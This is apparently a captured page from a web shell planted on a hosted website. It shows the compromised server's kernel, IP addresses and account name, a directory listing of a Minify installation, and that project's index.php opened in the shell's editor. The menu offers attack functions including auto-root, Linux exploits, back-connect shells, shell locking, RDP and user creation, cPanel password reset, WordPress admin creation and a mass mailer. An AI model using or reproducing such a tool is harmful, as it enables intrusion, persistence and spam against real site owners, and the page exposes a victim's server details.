Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
vendor /
mrclay /
minify /
min /
[ HOME SHELL ]
Name
Size
Permission
Action
builder
[ DIR ]
drwx---r-x
lib
[ DIR ]
drwx---r-x
.htaccess
307
B
-rw----r--
config-test.php
292
B
-rw----r--
config.php
6.43
KB
-rw----r--
groupsConfig.php
416
B
-rw----r--
index.php
2.32
KB
-rw----r--
quick-test.css
548
B
-rw----r--
quick-test.js
2.75
KB
-rw----r--
server-info.php
642
B
-rw----r--
utils.php
2.68
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /** * Front controller for default Minify implementation * * DO NOT EDIT! Configure this utility via config.php and groupsConfig.php * * @package Minify */ define('MINIFY_MIN_DIR', dirname(__FILE__)); // set config path defaults $min_configPaths = array( 'base' => MINIFY_MIN_DIR . '/config.php', 'test' => MINIFY_MIN_DIR . '/config-test.php', 'groups' => MINIFY_MIN_DIR . '/groupsConfig.php' ); // check for custom config paths if (!empty($min_customConfigPaths) && is_array($min_customConfigPaths)) { $min_configPaths = array_merge($min_configPaths, $min_customConfigPaths); } // load config require $min_configPaths['base']; if (isset($_GET['test'])) { include $min_configPaths['test']; } require "$min_libPath/Minify/Loader.php"; Minify_Loader::register(); Minify::$uploaderHoursBehind = $min_uploaderHoursBehind; Minify::setCache( isset($min_cachePath) ? $min_cachePath : '' ,$min_cacheFileLocking ); if ($min_documentRoot) { $_SERVER['DOCUMENT_ROOT'] = $min_documentRoot; Minify::$isDocRootSet = true; } $min_serveOptions['minifierOptions']['text/css']['symlinks'] = $min_symlinks; // auto-add targets to allowDirs foreach ($min_symlinks as $uri => $target) { $min_serveOptions['minApp']['allowDirs'][] = $target; } if ($min_allowDebugFlag) { $min_serveOptions['debug'] = Minify_DebugDetector::shouldDebugRequest($_COOKIE, $_GET, $_SERVER['REQUEST_URI']); } if (!empty($min_concatOnly)) { $min_serveOptions['concatOnly'] = true; } if ($min_errorLogger) { if (true === $min_errorLogger) { $min_errorLogger = FirePHP::getInstance(true); } Minify_Logger::setLogger($min_errorLogger); } // check for URI versioning if (preg_match('/&\\d/', $_SERVER['QUERY_STRING']) || isset($_GET['v'])) { $min_serveOptions['maxAge'] = 31536000; } // need groups config? if (isset($_GET['g'])) { // well need groups config $min_serveOptions['minApp']['groups'] = (require $min_configPaths['groups']); } // serve or redirect if (isset($_GET['f']) || isset($_GET['g'])) { if (! isset($min_serveController)) { $min_serveController = new Minify_Controller_MinApp(); } Minify::serve($min_serveController, $min_serveOptions); } elseif ($min_enableBuilder) { header('Location: builder/'); exit; } else { header('Location: /'); exit; }
Close